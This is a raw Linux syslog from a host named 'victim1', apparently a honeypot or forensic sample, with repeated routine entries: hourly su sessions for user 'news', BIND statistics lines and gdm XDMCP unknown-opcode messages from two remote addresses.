Jan  9 04:02:52 victim1 syslogd 1.3-3: restart.
Jan  9 04:06:26 victim1 PAM_pwdb[12370]: (su) session opened for user news by (uid=0)
Jan  9 04:06:27 victim1 PAM_pwdb[12370]: (su) session closed for user news
Jan  9 04:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 04:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 04:21:57 victim1 named[385]: USAGE 947362917 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 04:21:57 victim1 named[385]: NSTATS 947362917 944119308
Jan  9 04:21:57 victim1 named[385]: XSTATS 947362917 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 04:39:46 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 05:01:01 victim1 PAM_pwdb[12584]: (su) session opened for user news by (uid=0)
Jan  9 05:01:03 victim1 PAM_pwdb[12584]: (su) session closed for user news
Jan  9 05:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 05:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 05:21:57 victim1 named[385]: USAGE 947366517 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 05:21:57 victim1 named[385]: NSTATS 947366517 944119308
Jan  9 05:21:57 victim1 named[385]: XSTATS 947366517 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 05:39:46 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 06:01:00 victim1 PAM_pwdb[12643]: (su) session opened for user news by (uid=0)
Jan  9 06:01:01 victim1 PAM_pwdb[12643]: (su) session closed for user news
Jan  9 06:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 06:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 06:21:57 victim1 named[385]: USAGE 947370117 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 06:21:57 victim1 named[385]: NSTATS 947370117 944119308
Jan  9 06:21:57 victim1 named[385]: XSTATS 947370117 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 06:39:46 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 07:01:00 victim1 PAM_pwdb[12702]: (su) session opened for user news by (uid=0)
Jan  9 07:01:01 victim1 PAM_pwdb[12702]: (su) session closed for user news
Jan  9 07:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 07:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 07:21:57 victim1 named[385]: USAGE 947373717 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 07:21:57 victim1 named[385]: NSTATS 947373717 944119308
Jan  9 07:21:57 victim1 named[385]: XSTATS 947373717 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 07:39:46 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 08:01:01 victim1 PAM_pwdb[12761]: (su) session opened for user news by (uid=0)
Jan  9 08:01:02 victim1 PAM_pwdb[12761]: (su) session closed for user news
Jan  9 08:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 08:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 08:21:57 victim1 named[385]: USAGE 947377317 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 08:21:57 victim1 named[385]: NSTATS 947377317 944119308
Jan  9 08:21:57 victim1 named[385]: XSTATS 947377317 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 08:39:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 09:01:00 victim1 PAM_pwdb[12820]: (su) session opened for user news by (uid=0)
Jan  9 09:01:01 victim1 PAM_pwdb[12820]: (su) session closed for user news
Jan  9 09:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 09:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 09:21:57 victim1 named[385]: USAGE 947380917 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 09:21:57 victim1 named[385]: NSTATS 947380917 944119308
Jan  9 09:21:57 victim1 named[385]: XSTATS 947380917 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 09:39:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 10:01:00 victim1 PAM_pwdb[12879]: (su) session opened for user news by (uid=0)
Jan  9 10:01:01 victim1 PAM_pwdb[12879]: (su) session closed for user news
Jan  9 10:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 10:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 10:21:57 victim1 named[385]: USAGE 947384517 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 10:21:57 victim1 named[385]: NSTATS 947384517 944119308
Jan  9 10:21:57 victim1 named[385]: XSTATS 947384517 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 10:39:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 11:01:00 victim1 PAM_pwdb[12940]: (su) session opened for user news by (uid=0)
Jan  9 11:01:01 victim1 PAM_pwdb[12940]: (su) session closed for user news
Jan  9 11:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 11:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 11:21:57 victim1 named[385]: USAGE 947388117 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 11:21:57 victim1 named[385]: NSTATS 947388117 944119308
Jan  9 11:21:57 victim1 named[385]: XSTATS 947388117 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 11:39:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 12:01:00 victim1 PAM_pwdb[12999]: (su) session opened for user news by (uid=0)
Jan  9 12:01:01 victim1 PAM_pwdb[12999]: (su) session closed for user news
Jan  9 12:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 12:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 12:21:57 victim1 named[385]: USAGE 947391717 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 12:21:57 victim1 named[385]: NSTATS 947391717 944119308
Jan  9 12:21:57 victim1 named[385]: XSTATS 947391717 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 12:39:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 13:01:01 victim1 PAM_pwdb[13058]: (su) session opened for user news by (uid=0)
Jan  9 13:01:02 victim1 PAM_pwdb[13058]: (su) session closed for user news
Jan  9 13:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 13:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 13:21:57 victim1 named[385]: USAGE 947395317 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 13:21:57 victim1 named[385]: NSTATS 947395317 944119308
Jan  9 13:21:57 victim1 named[385]: XSTATS 947395317 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 13:39:44 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 14:01:00 victim1 PAM_pwdb[13117]: (su) session opened for user news by (uid=0)
Jan  9 14:01:01 victim1 PAM_pwdb[13117]: (su) session closed for user news
Jan  9 14:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 14:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 14:21:57 victim1 named[385]: USAGE 947398917 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 14:21:57 victim1 named[385]: NSTATS 947398917 944119308
Jan  9 14:21:57 victim1 named[385]: XSTATS 947398917 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 14:39:44 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 15:01:00 victim1 PAM_pwdb[13176]: (su) session opened for user news by (uid=0)
Jan  9 15:01:01 victim1 PAM_pwdb[13176]: (su) session closed for user news
Jan  9 15:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 15:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 15:21:57 victim1 named[385]: USAGE 947402517 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 15:21:57 victim1 named[385]: NSTATS 947402517 944119308
Jan  9 15:21:57 victim1 named[385]: XSTATS 947402517 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 15:39:44 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 16:01:01 victim1 PAM_pwdb[13235]: (su) session opened for user news by (uid=0)
Jan  9 16:01:02 victim1 PAM_pwdb[13235]: (su) session closed for user news
Jan  9 16:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 16:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 16:21:57 victim1 named[385]: USAGE 947406117 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 16:21:57 victim1 named[385]: NSTATS 947406117 944119308
Jan  9 16:21:57 victim1 named[385]: XSTATS 947406117 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 16:39:44 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 17:01:00 victim1 PAM_pwdb[13294]: (su) session opened for user news by (uid=0)
Jan  9 17:01:02 victim1 PAM_pwdb[13294]: (su) session closed for user news
Jan  9 17:21:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 17:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 17:21:57 victim1 named[385]: USAGE 947409717 944119308 CPU=0.85u/2.81s CHILDCPU=0u/0s
Jan  9 17:21:57 victim1 named[385]: NSTATS 947409717 944119308
Jan  9 17:21:57 victim1 named[385]: XSTATS 947409717 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 17:39:44 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 18:01:00 victim1 PAM_pwdb[13353]: (su) session opened for user news by (uid=0)
Jan  9 18:01:01 victim1 PAM_pwdb[13353]: (su) session closed for user news
Jan  9 18:21:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 18:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 18:21:58 victim1 named[385]: USAGE 947413318 944119308 CPU=0.86u/2.84s CHILDCPU=0u/0s
Jan  9 18:21:58 victim1 named[385]: NSTATS 947413318 944119308
Jan  9 18:21:58 victim1 named[385]: XSTATS 947413318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 18:39:43 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 19:01:01 victim1 PAM_pwdb[13412]: (su) session opened for user news by (uid=0)
Jan  9 19:01:02 victim1 PAM_pwdb[13412]: (su) session closed for user news
Jan  9 19:21:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 19:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 19:21:58 victim1 named[385]: USAGE 947416918 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan  9 19:21:58 victim1 named[385]: NSTATS 947416918 944119308
Jan  9 19:21:58 victim1 named[385]: XSTATS 947416918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 19:39:43 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 20:01:01 victim1 PAM_pwdb[13471]: (su) session opened for user news by (uid=0)
Jan  9 20:01:02 victim1 PAM_pwdb[13471]: (su) session closed for user news
Jan  9 20:21:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 20:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 20:21:58 victim1 named[385]: USAGE 947420518 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan  9 20:21:58 victim1 named[385]: NSTATS 947420518 944119308
Jan  9 20:21:58 victim1 named[385]: XSTATS 947420518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 20:39:43 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 21:01:01 victim1 PAM_pwdb[13530]: (su) session opened for user news by (uid=0)
Jan  9 21:01:02 victim1 PAM_pwdb[13530]: (su) session closed for user news
Jan  9 21:21:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 21:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 21:21:58 victim1 named[385]: USAGE 947424118 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan  9 21:21:58 victim1 named[385]: NSTATS 947424118 944119308
Jan  9 21:21:58 victim1 named[385]: XSTATS 947424118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 21:39:43 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 22:01:00 victim1 PAM_pwdb[13589]: (su) session opened for user news by (uid=0)
Jan  9 22:01:01 victim1 PAM_pwdb[13589]: (su) session closed for user news
Jan  9 22:21:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 22:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 22:21:58 victim1 named[385]: USAGE 947427718 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan  9 22:21:58 victim1 named[385]: NSTATS 947427718 944119308
Jan  9 22:21:58 victim1 named[385]: XSTATS 947427718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 22:39:43 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan  9 23:01:00 victim1 PAM_pwdb[13648]: (su) session opened for user news by (uid=0)
Jan  9 23:01:01 victim1 PAM_pwdb[13648]: (su) session closed for user news
Jan  9 23:21:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan  9 23:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan  9 23:21:58 victim1 named[385]: USAGE 947431318 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan  9 23:21:58 victim1 named[385]: NSTATS 947431318 944119308
Jan  9 23:21:58 victim1 named[385]: XSTATS 947431318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan  9 23:39:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 00:01:01 victim1 PAM_pwdb[13707]: (su) session opened for user news by (uid=0)
Jan 10 00:01:01 victim1 PAM_pwdb[13707]: (su) session closed for user news
Jan 10 00:21:17 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 00:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 00:21:58 victim1 named[385]: USAGE 947434918 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 00:21:58 victim1 named[385]: NSTATS 947434918 944119308
Jan 10 00:21:58 victim1 named[385]: XSTATS 947434918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 00:33:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 00:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 00:39:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 01:01:00 victim1 PAM_pwdb[13766]: (su) session opened for user news by (uid=0)
Jan 10 01:01:01 victim1 PAM_pwdb[13766]: (su) session closed for user news
Jan 10 01:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 01:21:58 victim1 named[385]: USAGE 947438518 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 01:21:58 victim1 named[385]: NSTATS 947438518 944119308
Jan 10 01:21:58 victim1 named[385]: XSTATS 947438518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 01:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 01:39:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 02:01:00 victim1 PAM_pwdb[13825]: (su) session opened for user news by (uid=0)
Jan 10 02:01:01 victim1 PAM_pwdb[13825]: (su) session closed for user news
Jan 10 02:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 02:21:58 victim1 named[385]: USAGE 947442118 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 02:21:58 victim1 named[385]: NSTATS 947442118 944119308
Jan 10 02:21:58 victim1 named[385]: XSTATS 947442118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 02:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 02:39:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 03:01:00 victim1 PAM_pwdb[13884]: (su) session opened for user news by (uid=0)
Jan 10 03:01:02 victim1 PAM_pwdb[13884]: (su) session closed for user news
Jan 10 03:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 03:21:58 victim1 named[385]: USAGE 947445718 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 03:21:58 victim1 named[385]: NSTATS 947445718 944119308
Jan 10 03:21:58 victim1 named[385]: XSTATS 947445718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 03:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 03:39:42 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 04:01:01 victim1 PAM_pwdb[13943]: (su) session opened for user news by (uid=0)
Jan 10 04:01:01 victim1 PAM_pwdb[13943]: (su) session closed for user news
Jan 10 04:02:01 victim1 PAM_pwdb[13983]: (su) session opened for user news by (uid=0)
Jan 10 04:02:48 victim1 PAM_pwdb[13983]: (su) session closed for user news
Jan 10 04:06:17 victim1 PAM_pwdb[14456]: (su) session opened for user news by (uid=0)
Jan 10 04:06:18 victim1 PAM_pwdb[14456]: (su) session closed for user news
Jan 10 04:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 04:21:58 victim1 named[385]: USAGE 947449318 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 04:21:58 victim1 named[385]: NSTATS 947449318 944119308
Jan 10 04:21:58 victim1 named[385]: XSTATS 947449318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 04:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 04:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 05:01:00 victim1 PAM_pwdb[14560]: (su) session opened for user news by (uid=0)
Jan 10 05:01:02 victim1 PAM_pwdb[14560]: (su) session closed for user news
Jan 10 05:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 05:21:58 victim1 named[385]: USAGE 947452918 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 05:21:58 victim1 named[385]: NSTATS 947452918 944119308
Jan 10 05:21:58 victim1 named[385]: XSTATS 947452918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 05:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 05:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 10 06:01:00 victim1 PAM_pwdb[14619]: (su) session opened for user news by (uid=0)
Jan 10 06:01:02 victim1 PAM_pwdb[14619]: (su) session closed for user news
Jan 10 06:21:57 victim1 named[385]: Cleaned cache of 0 RRs
Jan 10 06:21:58 victim1 named[385]: USAGE 947456518 944119308 CPU=0.87u/2.85s CHILDCPU=0u/0s
Jan 10 06:21:58 victim1 named[385]: NSTATS 947456518 944119308
Jan 10 06:21:58 victim1 named[385]: XSTATS 947456518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 10 06:37:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 10 06:39:41 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
